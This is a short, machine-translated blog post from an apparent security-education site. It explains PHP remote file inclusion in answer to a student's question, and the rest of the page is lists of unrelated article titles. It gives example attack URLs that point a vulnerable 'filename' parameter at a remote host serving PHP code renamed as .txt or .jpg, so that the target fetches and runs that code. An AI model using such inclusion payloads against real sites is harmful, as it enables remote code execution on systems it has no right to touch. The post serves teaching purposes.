当前位置:网站首页>File contains vulnerability issues
File contains vulnerability issues
2022-06-24 23:17:00 【Class hi Education】
A student asked a question before , The file contains whether the vulnerability can be loaded php file , Later, I answered this question on YuQue
When using File Inclusion Vulnerability to include remote files, such as :
http://localhost/index.php/?filename=http://xxx.com/phpinfo.php
phpinfo Whether the printed information is local information ?
answer : no
The contents contained in our remote file are as follows php Parse the rendered , If you directly pull the executed php That will get the result directly , So, oh, we pull them in other formats , Such as :
http://localhost/index.php/?filename=http://xxx.com/phpinfo.txt
http://localhost/index.php/?filename=http://xxx.com/phpinfo.jpg
And so on, so that the content can be parsed into php. Switch to jsp The same applies to type websites
边栏推荐
猜你喜欢
Installation and deployment of ganglia
Main cause of EMI - mold current
案例解析:用「度量」提升企业研发效能|ONES Talk
![[Wuhan University] information sharing of the first and second postgraduate entrance examinations](/img/ec/884e656a921e20a5679a2960c9ac4d.jpg)
[Wuhan University] information sharing of the first and second postgraduate entrance examinations
Docker installation MySQL simple without pit
23研考生注意啦!备考期间最容易中招的骗局,居然是它们?!
【基础知识】~ 半加器 & 全加器
【js】-【數組、棧、隊列、鏈錶基礎】-筆記
Record the range of data that MySQL update will lock
慕思股份深交所上市:靠床垫和“洋老头”走红 市值224亿
随机推荐
Super detailed cookie addition, deletion, modification and query
Epics record reference 3 -- fields common to all records
Record the range of data that MySQL update will lock
The extra points and sharp tools are worthy of the trust | know that Chuangyu won the letter of thanks from the defense side of the attack and defense drill!
Cases of addition, deletion, modification and search of C # learning for two years and C # import and export (de duplication)
Financial management [5]
InnoDB, the storage engine of MySQL Architecture Principle_ Redo log and binlog
Do you need to improve your code reading ability? It's a trick
OpenSSL SSL_read: Connection was reset, errno 10054
F29oc analysis
Building Survey [2]
laravel用户授权
#22Map介绍与API
How to add Google maps to a project
2022 simulated 100 questions and simulated examination of high-altitude installation, maintenance and demolition
Design and implementation of spark offline development framework
【基础知识】~ 半加器 & 全加器
Laravel add helper file
Laravel message queue
RT-thread使用rt-kprintf